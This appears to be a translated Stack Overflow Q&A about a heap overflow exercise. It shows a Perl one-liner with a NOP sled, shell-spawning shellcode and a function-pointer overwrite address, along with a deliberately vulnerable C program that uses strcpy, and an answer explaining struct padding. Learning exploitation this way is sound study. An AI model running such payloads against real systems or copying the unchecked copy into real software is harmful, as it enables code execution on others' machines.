当尝试执行基本的堆攻击时,除了输入字符串的大小外,我什么都明白。可以使用 perl -e 'print "\x90"x (760) 来利用以下代码。 "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"。 "\x00\x98\x04\x08"' 作为程序的参数。使用的 shellcode 有 21 个字节长。这里的总字符串大小为 785 字节,即 777 个缓冲区 + 4 个我不知道的内容和 4 个我们正在覆盖的函数指针。
我读了here这 4 个字节是:
A pointer keeps track the top of heap similar to the stack pointer of the stack
我的假设是否正确?
#include <stdio.h>
#include <unistd.h>
void greetUser(char *s) {
printf("Hello %s!\n", s);
}
struct data_t {
char buf[777];
void (*fp)(char *);
} somedata;
int main(int argc, char **argv) {
somedata.fp = &greetUser;
if(argc < 2) {
printf("Usage: %s YourName\n", argv[0]);
exit(1);
}
strcpy(somedata.buf, argv[1]);
(somedata.fp)(somedata.buf);
return 0;
}
最佳答案
不,这是不正确的。 你只需要溢出 784 个字节:
char buf[777]; // 777 bytes
<padding> // usually 7 bytes to have fp 8-byte-aligned
void (*fp)(char *); // 8 bytes function pointer
在 64 位系统上。在 32 位系统上,fp 应该是 4 字节对齐的(因此 fp 在结构开始后的 780 字节处开始)
关于c - 堆溢出 - 堆的结构,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/34274840/